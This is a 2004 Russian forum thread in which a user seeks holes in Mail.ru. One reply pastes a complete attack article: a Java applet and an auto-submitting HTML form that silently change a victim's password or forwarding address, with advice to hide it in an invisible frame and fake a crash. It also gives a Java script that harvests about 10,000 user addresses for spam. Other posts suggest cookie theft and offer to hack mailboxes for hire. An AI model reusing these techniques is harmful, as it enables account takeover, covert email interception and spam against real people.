Большой Воронежский Форум

Если это ваш первый визит, рекомендуем почитать справку по форуму. Для размещения своих сообщений необходимо зарегистрироваться. Для просмотра сообщений выберите раздел.
Вернуться   Большой Воронежский Форум » Коммуникации и связь в Воронеже » » Коммуникации
Обсуждение всего, что связано с интернет, а также сетевого оборудования и сетевых технологий от офисных сетей до домашних.

telecomservice
freedom
Ответ
 
Опции темы
Старый 08.07.2004, 00:33   #1   
Форумец
 
Аватар для torontino
 
Сообщений: 4
Регистрация: 04.07.2003
Возраст: 42

torontino вне форума Не в сети
Exclamation nuzhen znatok sushchestvuyushchih mail serverov

Narod!!!!


Kto-nit' horosho znaet Mail.ru?????

Osobo interesni diri...

Esli ne tuda obratilsya - zaranee izvinite....
  Ответить с цитированием
Старый 08.07.2004, 11:48   #2   
Murderator
 
Аватар для ZEUS
 
Сообщений: 4,384
Регистрация: 19.07.2003

ZEUS вне форума Не в сети
torontino ИМХО, конечно, но про сабж лучше самих админов MAIL.RU никто ничего не расскажет, особенно про diri
  Ответить с цитированием
Старый 08.07.2004, 11:51   #3   
йцукен
 
Аватар для Melissa
 
Сообщений: 1,855
Регистрация: 07.11.2003

Melissa вне форума Не в сети
torontino блин, ну есть же русская клавиатура..
  Ответить с цитированием
Старый 08.07.2004, 11:53   #4   
мегапиксель
 
Аватар для DeeP
 
Сообщений: 8,232
Регистрация: 24.10.2003
Возраст: 46
Записей в дневнике: 8

DeeP вне форума Не в сети
Re: nuzhen znatok sushchestvuyushchih mail serverov

Цитата:
Первоначальное сообщение от torontino
Osobo interesni diri...
Esli ne tuda obratilsya - zaranee izvinite....
Konechno ne tuda. Pro diri obrastchaisya vot suda: diri
  Ответить с цитированием
Старый 08.07.2004, 11:56   #5   
И.О. модератора
 
Аватар для deniboy
 
Сообщений: 1,478
Регистрация: 02.05.2003
Возраст: 37

deniboy вне форума Не в сети
torontino почитай - http://gureev.narod.ru/info/mail-vzlom.htm
  Ответить с цитированием
Старый 08.07.2004, 12:08   #6   
Форумец
 
Сообщений: 213
Регистрация: 29.06.2003

OlegD вне форума Не в сети
DC Ох разводилово.
  Ответить с цитированием
Старый 08.07.2004, 12:18   #7   
И.О. модератора
 
Аватар для deniboy
 
Сообщений: 1,478
Регистрация: 02.05.2003
Возраст: 37

deniboy вне форума Не в сети
OlegD думаешь?
  Ответить с цитированием
Старый 08.07.2004, 17:03   #8   
it debil
 
Аватар для Zexes[LT]
 
Сообщений: 1,578
Регистрация: 24.03.2003
Возраст: 38

Zexes[LT] вне форума Не в сети
DC хнык, загон... гы!


torontino фтыкай http://gureev.narod.ru/info/mail-vzlom.htm
  Ответить с цитированием
Старый 08.07.2004, 18:43   #9   
Форумец
 
Сообщений: 213
Регистрация: 29.06.2003

OlegD вне форума Не в сети
DC Естественно. Рассчитано на дураков, которые отошлют свои учетные данные (в письме на "робота" нужно, как видим, указать свои учетные данные вплоть до пароля на ящик) тому, кто заранее зарегистрировал ящик с "роботским" именем а потом развешал везде "инструкцию по взлому".
  Ответить с цитированием
Старый 09.07.2004, 02:15   #10   
Форумец
 
Аватар для torontino
 
Сообщений: 4
Регистрация: 04.07.2003
Возраст: 42

torontino вне форума Не в сети
Melissa V Rossii mozhet bit' i est'))) No pomimo klaviaturi nado eshcho koe-chto imet', devushka!!!!

torontino добавил [date]1089328759[/date]:
Zexes[LT], DC spasibo, muzhiki.... vi voobshche ee probovali?? Da i esli ona i rabotala, to ochen' davno, a voobshche OlegD prav.... Eto ochevidno)) No i za sovet spasibo))

torontino добавил [date]1089328926[/date]:
DeeP A ya dumal s etimi dirami uzhe vsyo yasno...
  Ответить с цитированием
Старый 09.07.2004, 06:42   #11   
Форумец
 
Сообщений: 4,909
Регистрация: 08.04.2003
Возраст: 42

zic вне форума Не в сети
дыры определнно есть , как и везде, но об актуальных ты врятли поулчишь информацию просто вот так и тем более на этом форуме.
  Ответить с цитированием
Старый 09.07.2004, 22:06   #12   
Форумец
 
Аватар для torontino
 
Сообщений: 4
Регистрация: 04.07.2003
Возраст: 42

torontino вне форума Не в сети
zic popitka ne pitka.... teper' budu znat', chto tut takih net.... spasibo)))
  Ответить с цитированием
Старый 17.07.2004, 15:59   #13   
Форумец
 
Аватар для badtemp
 
Сообщений: 28
Регистрация: 13.07.2004

badtemp вне форума Не в сети
torontino на ка почитай, если не влом...
В последнее время значительную популярность обрели почтовые системы на основе WWW-Интерфейса ( www.hotmail.com, www.mail.com, www.netscape.net в России - www.mail.ru). Web-почту "местного значения" также предлагают провайдеры, работающие по схемам "Интернет-Кард" или "Интернет-в-кредит". Честно говоря, совершенно непонятны причины такого успеха. Сторонники подобных систем обычно заявляют о простоте и удобстве пользования, при большей безопасности, ссылаясь на огромное кол-во вирусов и печальный пример MS Outlook и MS Outlook Express 5. Первые два аргумента, похоже, соответствуют действительности, а о безопасности поговорим чуть ниже.

В статье будет рассмотрен один из вариантов технического подхода к вскрытию почтового ящика, основанного на совместном использовании недоработок современных браузеров, принципиальных недостатках CGI, и ошибках в политике безопасности почтовых служб. Именно он чаще всего применяется в атаках на Web-почту. Для "конкретности", будет описан найденый автором метод "захвата" или "подслушивания" пользователя популярной в России системе mail.ru и способ защиты.

1. Принципиальные недостатки безопасности WWW-почты.

(Не)Надежность обычной почтовой програмы определяется (без)грамотностью её написания.

Браузер же как система прочтения почты изначально недостаточно безопасен, поэтому создатели почты вынуждены налагать ограничения на теги, используемые в письмах ( <script ...>, <iframe> и т.д.). Как правило, встроенный фильтр просто удаляет "небезопасные" с его точки зрения инструкции. Принципиальных недостатков у подобного подхода два: (1) слишком строгие фильтры могут повредить само письмо, да и (2) трудно предугадать заранее, на что способна безопасная с виду конструкция. Тем не менее, именно на фильтрации основаны большинство существующих почтовых систем.

Cамый же уязвимый элемент - это способ задания пользовательских настроек и пароля. Они, как правило, задаются с помощью CGI-форм (как наиболее распространённого стандарта) по тем же каналам, что используются для работы с почтой, и могут быть вызваны любым членам сети, сумевшим подделать ip и cookies пользователя, или (что гораздо проще) временно захватившим контроль над браузером.

2. Технология атаки.

Итак, мы решили перехватить контроль у пользователя xxxx почтовой системы с Web- интерфейсом, например yyyy.zz. Только убедитесь, что он действительно пользуется web-интерфейсом, а не читает почту через pop3 -сервер или пользуется форвардингом.

Заводим почтовый ящик на этом же сервисе и в первую очередь смотрим, как задаются и изменяются пароль и прочие настройки. На mail.ru (и многих других) это делает обычная форма, результаты заполнения которой передаются в CGI-скрипт

cgi-bin/modifyuser?modify

Для идентификации пользователя, похоже, используется скрытое поле

<input type="hidden" name="Username" value="intst1">

Нам предоставляется вохможность изменить :

имя пользователя;
<input type="text" name="RealName" value="A. V. Komlni">

адрес пересылки (форвардинга) и возможность сохранения почты при этом;
<input type="text" name="Forward" value="...">
<input type=checkbox name="Flags.DoNotKeepMail" >

пароль;
<input type="password" name="Password" value="****************">
<input type="password" name="Password_Verify" value="****************">

Попробуем сформировать соответствующий файл, задав в скрытом поле имя интересующего нас пользователя и отослать форму, т.к. CGI, увы, не проверяет место нахождения формы-запроса.

<form method=post action="http://koi.mail.ru/cgi-bin/modifyuser?modify">

Не получилось. Быть может, в интересующей Вас системе этого окажется достаточно, а в mail.ru такие шутки не проходят.

Значит, пользователь идентифицируется с помощью cookies или, хуже того, ip. Пробуем вручную отредактировать cookies - результат тот же. Следовательно, эту форму должен отослать сам пользователь.

Наиболее простой способ захвата контроля над браузером - внедрение <script> и &{ ... } конструкций в письмо - давно уже пресечён с помощью фильтров почти всеми, и mail.ru в том числе. Тем не менее попробуйте, чем чёрт не шутит. Если теги разрешены, то фильтрация самого javascript иногда может быть обойдена при помощи средств динамической генерации кода.

Неплохой результат иногда дают конструкции вида <тег [XX]SRC=...>, например <IMAGE LoSrc="javascript..."...> , <IFRAME SCR="about: <script...> ..."> для IE и <ilayer src="mocha:..."> для NC. ("mocha" - это старый, всеми позабытый аналог модификатора "javascript", сохранившийся в NC). Вообще, чем реже используется тот или иной тег тем больше вероятность, что разработчики забыли его офильтровать...). Недостаток этого подхода в том, что требуется знать тип и версию используемого браузера.

К сожалению (вернее к счастью), у программистов mail.ru память хорошая. В конце концов это их и подвело. Наверное, они (да и не только они, похоже) читали "умные" книжки, запомнив, что Java - одна из самых безопасных технологий в сети. Поэтому и разрешили тег <Applet...>.

В стандарте Java есть класс AppletContext (зачем?!), позволяющий нам открывать новые окна или менять текущие.

URL myURL=new URL("http:...editprofil.html"); getAppletContext().showDocument(myURL,"_self"); getAppletContext().showDocument(myURL,"newwin");
На любой общедоступной страничке размещаем файл editprofil.html ( содержащий требуемую форму), прописываем к нему путь в апплете, который размещаем там-же и высылаем пользователю письмо, содержащее вызов апплета. Этот эксплойт не зависит от браузера, одинаково "хорошо" работая в IE и NC. ( не забудьте отредактировать _ПУТЬ_)

<applet code=readr.class name=readrie codebase="_ПУТЬ_/" width=320 height=240 > <B> SET Java On</B> </applet> ------------------------------------------------------ readr.java ( не забудьте отредактировать _ПУТЬ_) ------------------------------------------------------- import java.applet.*; import java.awt.*; import java.net.*; public class readrie extends Applet { public void paint(Graphics g) { try { URL myURL=new URL("_ПУТЬ_editprofil.html"); getAppletContext().showDocument(myURL,"_self"); } catch (Exception e) { g.drawString("Error", 10, 10); } } } -------------------------------------------------------------------- editprofil.html ( не забудьте отредактировать ИМЯ_ПОЛЬЗОВАТЕЛЯ и НОВЫЙ_ПАРОЛЬ) -------------------------------------------------------------------- <html> <body> <form method=post action="http://koi.mail.ru/cgi-bin/modifyuser?modify"> <input type="hidden" name="Username" value=" ИМЯ_ПОЛЬЗОВАТЕЛЯ "> <input type="text" name="RealName" value="A. V. Komlni"> <input type="text" name="Forward" value=""> <input type="password" name="Password" value=" НОВЫЙ_ПАРОЛЬ "> <input type="password" name="Password_Verify" value=" НОВЫЙ_ПАРОЛЬ "> <input type=checkbox name="Flags.DoNotKeepMail" > Не сохранять почту при пересылке<br> <input type="submit" value="Сохранить"> <input type="reset" value="Восстановить"> </form> <SCRIPT LANGUAGE="JavaScript"> document.forms[0].submit(); </script> </body> </html>
Письмо можно сформировать просто присоединением (attach) HTML -файла (в Netscape Messenger, например) содержащего необходимые теги. Присоединенный в Messenger'е HTML-файл mail.ru откроет автоматически.

Как только абонент попытается прочитать письмо, выполнится апплет, и через несколько секунд форма будет отослана от имени жертвы.

Вот, в принципе, и всё. Пользователю присвоен новый пароль. Если мы хотим "просто подслушивать" пользователя, в значение полей Password необходимо внести 16 звёздочек, а в поле Forward - куда отсылать копии. Это довольно рискованный вариант: пользователь может случайно заглянуть в настройки и заметить адрес.

<input type="text" name="Forward" value="spy_addr@xxxx.zz"> <input type="password" name="Password" value="****************"> <input type="password" name="Password_Verify" value="****************">

3. Макияж...

Не стоит, конечно, проводить всю эту процедуру перед глазами пользователя ( может он ещё не отключил подтверждение на отправку форм или успеет запомнить разглядеть и запомнить новый пароль). Разумнее переадресовать апплет на какой-нибудь файл содержащий frameset

<FRAMESET COLS="99%,1%"> <FRAME SRC="zastavka.html" NAME="v1"> <FRAME SRC="editprofile.html" NAME="w1">

где zastavka маскирует письмо под безобидную рекламу или дружеское письмо, а editprofile выполняется в невидимом фрейме.
По окончании смены паролей лучше сымитировать сбой т.к. в течении сеанса пользователь может исправить пароль. В IE под Win 95/98, например, достаточно выполнить скрипт open("************open(window.location)"); приводящий к бесконечному размножению окон, требующему перезагрузки. Само письмо лучше отослать (на случай неудачи) от анонимной службы рассылки писем.

Защититься от этой атаки как всегда просто. Отключить Java, а лучше, отказаться от использования Web-интерфейсов. Тот же mail.ru предлагает и форвардинг и pop-сервера. Экономия на настройке приносит проблемы с безопасностью не только администраторам больших сетей, поверьте.

4. Составляем список абонентов сервера.

Заветной мечтой всех спамеров мира является список (база) абонентов. Недаром, в их среде постоянно ходят слухи о каких-то почтовых серверах, поддерживающих команду finger . Также пару дней назад на форуме видел очередной крик души ( если таковая ещё жива ;-) :

"Нужна база е-мейлов по заграничным и Московским сайтам $$$ - Вася 02:53:36 06/1/2000 (0)"

Нередко почтовые Web-сервера могут "бесплатно" предоставить подобную информацию. Метод её получения довольно прост. При легальной работе с почтовым ящиком запоминаем адреса CGI-скриптов, ответственных за смену и чтение параметров пользователей. Потом, вызываем их без параметров (форм). Вполне вероятны ошибки в скриптах, при которых они отработают с последними занесёнными ( или использующимися в текущий момент) именами пользователей.

Конечно, шансов на то, что параметры можно изменить нулевые, а вот сообщение об ошибке доступа вполне может содержать имя пользователя, как это происходит на mail.ru. При обращении к тому-же "http://koi.mail.ru/cgi-bin/modifyuser?modify" выдаётся сообщение вида

Настройки пользователя mnebojsa@mail.ru Ошибка.Не заполнены необходимые поля. -
При следующем обращении "сдастся" следующий пользователь или "@/" если таковых не окажется. Осталось исследовать внутреннюю структуру ответа, да написать программу, повторяющую подобные запросы и фильтрующую ответ в поисках нужной информации. Лучше запускать её в часы пик

------------------------- http://www.chat.ru/~avkvladru/mail/getname.java ------------------------- import java.io.*; import java.net.*; import java.util.*; public class getname { public static void main(String args[]) { String nextline; try { URL mailserv= new URL("http://koi.mail.ru/cgi-bin/modifyuser?modify"); for (int i=1;i<=10000;i++) { DataInputStream input = newDataInputStream ( mailserv.openConnection().getInputStream()); nextline=input.readLine(); nextline=input.readLine(); nextline=input.readLine();// Нужный нам адрес - в третьей строке // выходного документа System.out.println( nextline); input.close(); } } catch(Exception ioe) { System.out.println(ioe.toString()); } } }; --------------------------------------------------
Вызовы команд вида ( в среде JDK)

:javac getname.java - компилируем файл
:java getname > userlist.txt

занесут в файл userlist.txt примерно 10000 e-mail адресов.

Теперь больной манией величия "хаксор" вполне может создать программу, автоматически рассылающую письма-ловушки отбирающие почтовые ящики, практичный спаммер - рекламу, а конкуренты - сообщение, вида: "бесплатный сервис mail.ru будет с начала месяца прекращён, воспользуйтесь xxxx.ru" или всё вместе.

badtemp добавил [date]1090069442[/date]:
torontino а вообще я в инете много инфы по этой теме искал... Большинство - пи....
Да и вообще для каких целей тебе это надо???
Если просто надо сломать чей-то ящик, то можна и попроще :-)))
Если жертва пользуется веб интерфейсом (натуральное ламо), то можно стянуть какисы...
Если пользуется The Bat и другими почтовыми прогами, то можна использовать проги, которые тырят пароли из конфиг файлов...

badtemp добавил [date]1090069452[/date]:
torontino а вообще я в инете много инфы по этой теме искал... Большинство - пи....
Да и вообще для каких целей тебе это надо???
Если просто надо сломать чей-то ящик, то можна и попроще :-)))
Если жертва пользуется веб интерфейсом (натуральное ламо), то можно стянуть какисы...
Если пользуется The Bat и другими почтовыми прогами, то можна использовать проги, которые тырят пароли из конфиг файлов...
  Ответить с цитированием
Старый 19.07.2004, 14:28   #14   
Форумец
 
Аватар для sturb
 
Сообщений: 2,326
Регистрация: 19.06.2003

sturb вне форума Не в сети
DC Ты еще не взломал mail.ru таким способом?
Но свой то собственный ящик наверняка просрал
  Ответить с цитированием
Старый 23.07.2004, 00:24   #15   
Форумец
 
Аватар для badtemp
 
Сообщений: 28
Регистрация: 13.07.2004

badtemp вне форума Не в сети
Мля, заибэ меня эта тема :-(((
Хоть кто-нть реально ломанул чье-нть мыло??? Признавайтесь!!!
  Ответить с цитированием
Старый 27.07.2004, 22:54   #16   
армия Ктулху
 
Аватар для Fiery Phoenix
 
Сообщений: 605
Регистрация: 19.03.2004

Fiery Phoenix вне форума Не в сети
Я ломал мыло, раза 3, 2 из них на mail.ru
Могу на заказ попробовать хакнуть любое мыло на халявном серваке.
  Ответить с цитированием
Поиск в теме: 



Быстрый переход:

  Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. Перевод: zCarot
Support by DrIQ & Netwind